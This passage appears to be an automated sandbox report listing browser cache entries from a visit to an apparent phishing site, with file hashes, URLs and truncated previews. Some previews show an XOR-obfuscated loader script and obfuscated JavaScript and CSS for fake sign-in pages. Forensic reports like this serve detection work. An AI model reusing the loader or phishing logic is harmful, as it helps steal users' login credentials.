...(.O....".d<.l..9..\|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

Chrome Cache Entry: 106

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	7390
Entropy (8bit):	4.02755241095864
Encrypted:	false
SSDEEP:
MD5:	B59C16CA9BF156438A8A96D45E33DB64
SHA1:	4E51B7D3477414B220F688ADABD76D3AE6472EE3
SHA-256:	A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
SHA-512:	2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/ij8dcdZWm15bu9YGZHHeZxzlnAx6KFbpdyG1uAcdkGADTE7Buz20uH75EK56167
Preview:	<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	70712
Entropy (8bit):	6.94130504124589
Encrypted:	false
SSDEEP:
MD5:	F70FF06D19498D80B130EC78176FD3FF
SHA1:	9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
SHA-256:	DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
SHA-512:	543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	231
Entropy (8bit):	6.725074433303473
Encrypted:	false
SSDEEP:
MD5:	547988BAC5584B4608466D761E16F370
SHA1:	C11BB71049702528402A31027F200184910A7E23
SHA-256:	70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
SHA-512:	C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.\|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.

Chrome Cache Entry: 111

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
Category:	downloaded
Size (bytes):	28000
Entropy (8bit):	7.99335735457429
Encrypted:	true
SSDEEP:
MD5:	A4BCA6C95FED0D0C5CC46CF07710DCEC
SHA1:	73B56E33B82B42921DB8702A33EFD0F2B2EC9794
SHA-256:	5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
SHA-512:	60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/pqQda3T5340JS1bxxuPn122Jgqrxwx40
Preview:	wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...\|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..\|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[\|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,......e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.\|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..\|.`...5:.Yd@]..j..$...v.

Chrome Cache Entry: 112

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (42414)
Category:	downloaded
Size (bytes):	42415
Entropy (8bit):	5.374174676958316
Encrypted:	false
SSDEEP:
MD5:	F94A2211CE789A95A7C67E8C660D63E8
SHA1:	F1FC19B6BCB96D0A905BF3192AAFF0885FF9F36F
SHA-256:	926DC3302F99EC05E4206E965DDEB7250F5910A8C38E82C7BEAFB724BBAAF37B
SHA-512:	EAC0FC89C2D6CCEB9F4C18DFC610DFF8BC194D3994F0C74B3D991F8423C6DADE11D805E76124596521C58AFA9939B45D2D3157F0A48626E12548020FC38364D3
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/b/471dc2adc340/api.js?render=explicit
Preview:	"use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);function m(h){bt(s,o,u,m,b,"next",h)}function b(h){bt(s,o,u,m,b,"throw",h)}m(void 0)})}}function M(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):M(e,r)}function Ie(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ve(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),o.forEach(function(u){Ie(e,u,t[u])})}return e}function fr(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 113

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 114

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
Category:	downloaded
Size (bytes):	1812
Entropy (8bit):	5.963239137067256
Encrypted:	false
SSDEEP:
MD5:	BD05C921AE0BC77DA0F8A853294D416A
SHA1:	E1A7C00EAA526F150C0B0970FEF7337A55C1F7CE
SHA-256:	954595F98EE3AF20FCFA80EC4F4AC9A59BC1F47B0EEC90C76DC24DEC61E0A24F
SHA-512:	7A8426F9CC6AD2C7F1211813176F12C2FEE3A045AC6F0254D7E2BAABB2534A4DEC237F2124CAB857BC7911C2D058591ED9DCD2D5DDC8B1BB93FA3AFA1792A0BC
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/WnXlOu/
Preview:	<script>..function GItcrGSxAT(YQwdsEsHup, pDlypEuiXB) {..let oICmXtORKs = '';..YQwdsEsHup = atob(YQwdsEsHup);..let aFIKMJwgWT = pDlypEuiXB.length;..for (let i = 0; i < YQwdsEsHup.length; i++) {.. oICmXtORKs += String.fromCharCode(YQwdsEsHup.charCodeAt(i) ^ pDlypEuiXB.charCodeAt(i % aFIKMJwgWT));..}..return oICmXtORKs;..}..var wvKvVltFMy = GItcrGSxAT(`ZhwZAhEZJQ9vfywOCFAPPD1GNCU9AjQ/WFRxRgsbPgANXhQGMlAWHDUBVBgZGjkfEQA4HA4CUFh4Cm9/PBoUEwwAPl9CEQ0BNhQwBCloFF0oGDcKEyoheS0Dc08BfXJJcRFCASgWWgt1Y3ERQlV6T1pQCgwlRBAbeg0OHxlBMEUNF3IdDT0CAhJBKjosRlNQRVRxQxU4IAQ5ADAmJwpvf3pPWlAFSTJQFhYyT1IVCht4ERl4UE9aUFhJcRFCBz8bDwIWSTdQDgY/VHd6WElxER94UBJ3ehEPeUY3GS05KhcVJx4RX0h6TVhZA2RbEUJVehgTHhwGJh8OGjkODhkXB39ZEBA8T0dQDwA/VQ0CdAMVExkdOF4MWyoODhgWCDxUQl56TUVSWEJxEzpXYWJwDXVjOFdKAg8DDSYoDjx/LVV7UkdQWkt4Sm9/ek9aUBEPcRkGIjQjHjgVEQhHSgIPAw0mKA48fy1cc08BfXJJcRFCAzsdWiciJj1lKSI1KB1QRUkwRQ0XchgvHA8/AVYPOxVGQX1ySXERQgM7HVo5MhsUXgUDGCwCUEVJeWY4OjY7MScXLjYfDxQuDBJYV0EKbRVbdzJRMCMIfEsjWABfV0lWRAwaPlsBDlcKOUQLAU9MBxRI

Chrome Cache Entry: 115

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1400
Entropy (8bit):	7.808470583085035
Encrypted:	false
SSDEEP:
MD5:	333EE830E5AB72C41DD9126A27B4D878
SHA1:	12D8D66EBB3076F3D6069E133C3212F97C8774E1
SHA-256:	8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
SHA-512:	3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.\|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A..U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5\|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `......`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&\|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,\|Q...u.-.._....m.1...\|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9.(9..U...x$#.C...Nm...p.....J...

Chrome Cache Entry: 116

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1136)
Category:	downloaded
Size (bytes):	1628
Entropy (8bit):	5.28568623659676
Encrypted:	false
SSDEEP:
MD5:	ED8FDD2F1199E70071ADC56700C9142D
SHA1:	CDF1C9F3EEC9B54461365E988B5338899374354D
SHA-256:	98A0368A0F0F253E950ED1569BF63F7096E3F9504C494409C58760CE2C9D9DE4
SHA-512:	B5A24E407E3096B72D94DEB3A6F9709F161A9C628F7BA2DF37B5984297ECC57E125E704CBFE2DF41425DAD68C7A9CC21A9667C85687A5580D1788F62BE6D5100
Malicious:	false
Reputation:	unknown
URL:	https://firebasestorage.googleapis.com/cdn-cgi/images/trace/jschal/js/transparent.gif?ray=6a262fe50874400d
Preview:	<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.

Chrome Cache Entry: 117

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 35970, version 1.0
Category:	downloaded
Size (bytes):	35970
Entropy (8bit):	7.989503040923577
Encrypted:	false
SSDEEP:
MD5:	496B7BBDE91C7DC7CF9BBABBB3921DA8
SHA1:	2BD3C406A715AB52DAD84C803C55BF4A6E66A924
SHA-256:	AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
SHA-512:	E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/yz30WezBhID78tnI27Gop44
Preview:	wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.\|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........

Chrome Cache Entry: 118

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
Category:	downloaded
Size (bytes):	109964
Entropy (8bit):	5.201196778775329
Encrypted:	false
SSDEEP:
MD5:	78A5500114640D663460BCBB33E694EB
SHA1:	C72B1B93C8BC2DDBD77BA3C042A8ED415B6B8E26
SHA-256:	E97FE9DB7CA567DA1F9F5A3B87B669146ADDF1983392C32FDA68C4D667A3CA22
SHA-512:	AAEB2961C7F93B8DF2600068C48706920D0DA1E1C2C925FBDFBED10E33120B05C9722ECBB63C6B3DD534D664CFB5F183CCF850591BBB78DAA89E0A3F637A450C
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/34s07N5SYNRjo7RklaWqg3mEzys8zdQx67105
Preview:	const _0x3c0b69=_0x40bd;(function(_0x1ffa3e,_0x743a4f){const _0x1f38a8=_0x40bd,_0x2d88b6=_0x1ffa3e();while(!![]){try{const _0x461944=-parseInt(_0x1f38a8(0x20b))/0x1+parseInt(_0x1f38a8(0x319))/0x2(parseInt(_0x1f38a8(0x2d0))/0x3)+parseInt(_0x1f38a8(0x2c7))/0x4(parseInt(_0x1f38a8(0x281))/0x5)+parseInt(_0x1f38a8(0x21b))/0x6+-parseInt(_0x1f38a8(0x34b))/0x7+parseInt(_0x1f38a8(0x1d9))/0x8+parseInt(_0x1f38a8(0x245))/0x9*(-parseInt(_0x1f38a8(0x2ac))/0xa);if(_0x461944===_0x743a4f)break;else _0x2d88b6['push'](_0x2d88b6['shift']());}catch(_0xf1881c){_0x2d88b6['push'](_0x2d88b6['shift']());}}}(_0x4624,0xa135c));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x332))[_0x3c0b69(0x2df)][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view=_0x3c0b69(0x2c8));document['getElementById'](_0x3c0b69(0x2a8))&&!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x2a8))['classList'][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view='uname_pdf');document[_0x3c0b69(0x326)](_0x3

Chrome Cache Entry: 121

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (23398), with no line terminators
Category:	downloaded
Size (bytes):	23398
Entropy (8bit):	5.104409455331282
Encrypted:	false
SSDEEP:
MD5:	C1C51D30D5E7094136F2D828349E520F
SHA1:	10AE8971AD7A8798BC9732707FE4896B57541557
SHA-256:	0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
SHA-512:	7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/3467cCZpgKNdD4ycdSfi18920
Preview:	,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit},input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco

Chrome Cache Entry: 122

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1437), with CRLF line terminators
Category:	downloaded
Size (bytes):	38221
Entropy (8bit):	5.115226983536052
Encrypted:	false
SSDEEP:
MD5:	FBE2FCF4596B299453C91B7231BA7427
SHA1:	743291EE60A551E043529AFDC9E3FBE72D70E776
SHA-256:	2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
SHA-512:	15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/xyBczc3irsvtgh23
Preview:	@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass

Chrome Cache Entry: 123

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2905
Entropy (8bit):	3.962263100945339
Encrypted:	false
SSDEEP:
MD5:	FE87496CC7A44412F7893A72099C120A
SHA1:	A0C1458C08A815DF63D3CB0406D60BE6607CA699
SHA-256:	55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
SHA-512:	E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

Chrome Cache Entry: 125

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45667)
Category:	downloaded
Size (bytes):	45806
Entropy (8bit):	5.207605835316031
Encrypted:	false
SSDEEP:
MD5:	80F5B8C6A9EEAC15DE93E5A112036A06
SHA1:	F7174635137D37581B11937FC90E9CB325077BCE
SHA-256:	0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
SHA-512:	B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
Malicious:	false
Reputation:	unknown
URL:	https://cdn.socket.io/4.6.0/socket.io.min.js
Preview:	/!. Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=

Chrome Cache Entry: 79

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (631)
Category:	downloaded
Size (bytes):	517649
Entropy (8bit):	5.713376874006511
Encrypted:	false
SSDEEP:
MD5:	E2E79D6B927169D9E0E57E3BAECC0993
SHA1:	1299473950B2999BA0B7F39BD5E4A60EAFD1819D
SHA-256:	231336ED913A5EBD4445B85486E053CAF2B81CAB91318241375F3F7A245B6C6B
SHA-512:	D6A2ED7B19E54D1447EE9BBC684AF7101B48086945A938A5F9B6AE74ACE30B9A98CA83D3183814DD3CC40F251AB6433DC7F8B425F313EA9557B83E1C2E035DFF
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js
